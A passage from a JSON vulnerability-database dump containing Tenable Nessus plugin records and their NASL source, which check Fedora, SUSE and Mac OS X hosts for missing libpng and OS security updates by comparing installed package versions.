10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:35:15", "references": ["http://www.nessus.org/u?2cd51874", "https://bugzilla.redhat.com/show_bug.cgi?id=1177327", "https://bugzilla.redhat.com/show_bug.cgi?id=1179186"], "pluginID": "81712", "description": "This update addresses a couple of buffer overflows that might allow context-dependent attackers to execute arbitrary code via very wide PNG images.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "reporter": "Tenable", "published": "2015-03-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "nessus", "title": "Fedora 21 : libpng10-1.0.63-1.fc21 (2015-2863)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:libpng10"], "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-2863.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81712", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2863.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81712);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:17 $\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_bugtraq_id(71820, 71994);\n script_xref(name:\"FEDORA\", value:\"2015-2863\");\n\n script_name(english:\"Fedora 21 : libpng10-1.0.63-1.fc21 (2015-2863)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses a couple of buffer overflows that might allow\ncontext-dependent attackers to execute arbitrary code via very wide\nPNG images.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1177327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1179186\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151350.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2cd51874\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"libpng10-1.0.63-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:41:27", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1177327", "http://www.nessus.org/u?6bd0f33a", "https://bugzilla.redhat.com/show_bug.cgi?id=1179186"], "pluginID": "81710", "edition": 2, "description": "This update addresses a couple of buffer overflows that might allow context-dependent attackers to execute arbitrary code via very wide PNG images.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "reporter": "Tenable", "published": "2015-03-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "nessus", "title": "Fedora 22 : libpng10-1.0.63-1.fc22 (2015-2765)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "cpe": ["cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:libpng10"], "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-2765.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81710", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2765.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81710);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:17 $\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_xref(name:\"FEDORA\", value:\"2015-2765\");\n\n script_name(english:\"Fedora 22 : libpng10-1.0.63-1.fc22 (2015-2765)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses a couple of buffer overflows that might allow\ncontext-dependent attackers to execute arbitrary code via very wide\nPNG images.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1177327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1179186\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151116.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6bd0f33a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"libpng10-1.0.63-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-01T09:33:21", "references": ["http://support.novell.com/security/cve/CVE-2014-9495.html", "http://support.novell.com/security/cve/CVE-2015-0973.html", "http://www.nessus.org/u?56bc0636", "https://bugzilla.suse.com/show_bug.cgi?id=912076", "https://bugzilla.suse.com/show_bug.cgi?id=912929"], "pluginID": "83669", "description": "This update fixes the following security issues :\n\n - CVE-2014-9495: libpng versions heap overflow vulnerability, that under certain circumstances could be exploit. [bnc#912076]\n\n - CVE-2015-0973: A heap-based overflow was found in the png_combine_row() function of the libpng library, when very large interlaced images were used.[bnc#912929]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "reporter": "Tenable", "published": "2015-05-20T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libpng16 (SUSE-SU-2015:0092-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2018-07-31T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libpng16-16", "p-cpe:/a:novell:suse_linux:libpng16", "p-cpe:/a:novell:suse_linux:libpng16-debugsource", "p-cpe:/a:novell:suse_linux:libpng16-16-debuginfo"], "id": "SUSE_SU-2015-0092-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83669", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0092-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83669);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/07/31 17:27:54\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_bugtraq_id(71820, 71994);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libpng16 (SUSE-SU-2015:0092-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - CVE-2014-9495: libpng versions heap overflow\n vulnerability, that under certain circumstances could be\n exploit. [bnc#912076]\n\n - CVE-2015-0973: A heap-based overflow was found in the\n png_combine_row() function of the libpng library, when\n very large interlaced images were used.[bnc#912929]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-9495.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0973.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=912076\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=912929\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150092-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?56bc0636\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-33\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-33\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-33\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpng16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpng16-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpng16-16-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpng16-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpng16-16-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpng16-16-debuginfo-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpng16-debugsource-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpng16-16-32bit-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpng16-16-debuginfo-32bit-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpng16-16-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpng16-16-32bit-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpng16-16-debuginfo-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpng16-16-debuginfo-32bit-1.6.8-5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpng16-debugsource-1.6.8-5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng16\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-15T03:32:44", "references": ["http://www.nessus.org/u?6c87f79a", "https://support.apple.com/en-us/HT206167"], "pluginID": "90097", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or 10.10.5 and is missing Security Update 2016-002. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache_mod_php\n - Kernel\n - libxml2\n - OpenSSH\n - Python\n - Tcl\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "edition": 4, "reporter": "Tenable", "published": "2016-03-22T00:00:00", "title": "Mac OS X 10.9.5 / 10.10.5 Multiple Vulnerabilities (Security Update 2016-002)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8126", "CVE-2015-5312", "CVE-2016-1761", "CVE-2016-1762", "CVE-2015-5334", "CVE-2015-7500", "CVE-2015-8242", "CVE-2015-1819", "CVE-2015-7499", "CVE-2016-1759", "CVE-2016-1754", "CVE-2015-0973", "CVE-2014-9495", "CVE-2015-8472", "CVE-2016-0778", "CVE-2016-1755", "CVE-2015-5333", "CVE-2015-7942", "CVE-2015-8035", "CVE-2016-0777"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2016-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=90097", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90097);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2014-9495\",\n \"CVE-2015-0973\",\n \"CVE-2015-1819\",\n \"CVE-2015-5312\",\n \"CVE-2015-5333\",\n \"CVE-2015-5334\",\n \"CVE-2015-7499\",\n \"CVE-2015-7500\",\n \"CVE-2015-7942\",\n \"CVE-2015-8035\",\n \"CVE-2015-8126\",\n \"CVE-2015-8242\",\n \"CVE-2015-8472\",\n \"CVE-2016-0777\",\n \"CVE-2016-0778\",\n \"CVE-2016-1754\",\n \"CVE-2016-1755\",\n \"CVE-2016-1759\",\n \"CVE-2016-1761\",\n \"CVE-2016-1762\"\n );\n script_bugtraq_id(\n 71820,\n 71994,\n 75570,\n 77112,\n 77390,\n 77568,\n 77681,\n 78624,\n 79507,\n 79509,\n 79536,\n 79562,\n 80695,\n 80698\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-03-21-5\");\n\n script_name(english:\"Mac OS X 10.9.5 / 10.10.5 Multiple Vulnerabilities (Security Update 2016-002)\");\n script_summary(english:\"Checks for the presence of Security Update 2016-002.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\n10.10.5 and is missing Security Update 2016-002. It is, therefore,\naffected by multiple vulnerabilities in the following components :\n\n - apache_mod_php\n - Kernel\n - libxml2\n - OpenSSH\n - Python\n - Tcl\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT206167\");\n # http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c87f79a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2016-002 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = \"2016-002\";\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\"))\n audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10)\\.5([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.9.5 or Mac OS X 10.10.5\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-15T04:04:03", "references": ["http://www.nessus.org/u?6c87f79a", "https://support.apple.com/en-us/HT206167"], "pluginID": "90096", "description": "The remote host is running a version of Mac OS X that is 10.11.x prior to 10.11.4. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache_mod_php\n - AppleRAID\n - AppleUSBNetworking\n - Bluetooth\n - Carbon\n - dyld\n - FontParser\n - HTTPProtocol\n - Intel Graphics Driver\n - IOFireWireFamily\n - IOGraphics\n - IOHIDFamily\n - IOUSBFamily\n - Kernel\n - libxml2\n - Messages\n - NVIDIA Graphics Drivers\n - OpenSSH\n - OpenSSL\n - Python\n - QuickTime\n - Reminders\n - Ruby\n - Security\n - Tcl\n - TrueTypeScaler\n - Wi-Fi\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "edition": 3, "reporter": "Tenable", "published": "2016-03-22T00:00:00", "title": "Mac OS X 10.11.x < 10.11.4 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1746", "CVE-2016-1734", "CVE-2015-8659", "CVE-2016-1773", "CVE-2015-8126", "CVE-2016-1768", "CVE-2016-1758", "CVE-2015-5312", "CVE-2016-1761", "CVE-2015-3195", "CVE-2016-1744", "CVE-2016-1762", "CVE-2016-1737", "CVE-2015-7551", "CVE-2016-1738", "CVE-2016-1756", "CVE-2016-1747", "CVE-2016-1752", "CVE-2016-1736", "CVE-2016-1740", "CVE-2016-1743", "CVE-2016-1775", "CVE-2016-1749", "CVE-2015-7500", "CVE-2016-0802", "CVE-2015-8242", "CVE-2016-1770", "CVE-2016-1757", "CVE-2015-1819", "CVE-2015-7499", "CVE-2016-1741", "CVE-2016-1759", "CVE-2016-1745", "CVE-2016-1732", "CVE-2016-1769", "CVE-2016-1754", "CVE-2015-0973", "CVE-2016-1950", "CVE-2016-1750", "CVE-2016-1748", "CVE-2014-9495", "CVE-2016-0801", "CVE-2015-8472", "CVE-2016-1764", "CVE-2016-0778", "CVE-2016-1755", "CVE-2016-1767", "CVE-2016-1753", "CVE-2016-1733", "CVE-2016-1788", "CVE-2016-1735", "CVE-2015-7942", "CVE-2015-8035", "CVE-2016-0777"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_4.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=90096", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90096);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2014-9495\",\n \"CVE-2015-0973\",\n \"CVE-2015-1819\",\n \"CVE-2015-3195\",\n \"CVE-2015-5312\",\n \"CVE-2015-7499\",\n \"CVE-2015-7500\",\n \"CVE-2015-7551\",\n \"CVE-2015-7942\",\n \"CVE-2015-8035\",\n \"CVE-2015-8126\",\n \"CVE-2015-8242\",\n \"CVE-2015-8472\",\n \"CVE-2015-8659\",\n \"CVE-2016-0777\",\n \"CVE-2016-0778\",\n \"CVE-2016-0801\",\n \"CVE-2016-0802\",\n 